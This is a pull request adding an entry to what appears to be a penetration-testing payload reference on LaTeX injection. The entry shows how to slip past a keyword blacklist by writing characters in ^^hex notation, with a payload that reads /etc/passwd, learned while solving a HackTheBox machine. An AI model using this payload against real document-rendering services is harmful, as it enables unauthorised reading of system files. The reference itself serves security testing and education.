### PR TITLE
latex injection add blacklist bypass

### DIFF
--- a/LaTeX Injection/README.md
+++ b/LaTeX Injection/README.md
@@ -53,6 +53,14 @@ characters can be deactivated in order to use `\input` on file containing `$`, `
 \input{path_to_script.pl}
 ```
 
+To bypass a blacklist try to replace one character with it's unicode hex value. 
+- ^^41 represents a capital A
+- ^^7e represents a tilde (~) note that the ‘e’ must be lower case
+
+```tex
+\lstin^^70utlisting{/etc/passwd}
+```
+
 ## Write file
 
 Write single lined file:


### PR DESCRIPTION
By solving the hackthebox machine "topology" I came across this latex injection blacklist bypass.
More information can be found here:
https://agiletribe.wordpress.com/2015/04/07/adding-unicode-characters-to-latex-documents/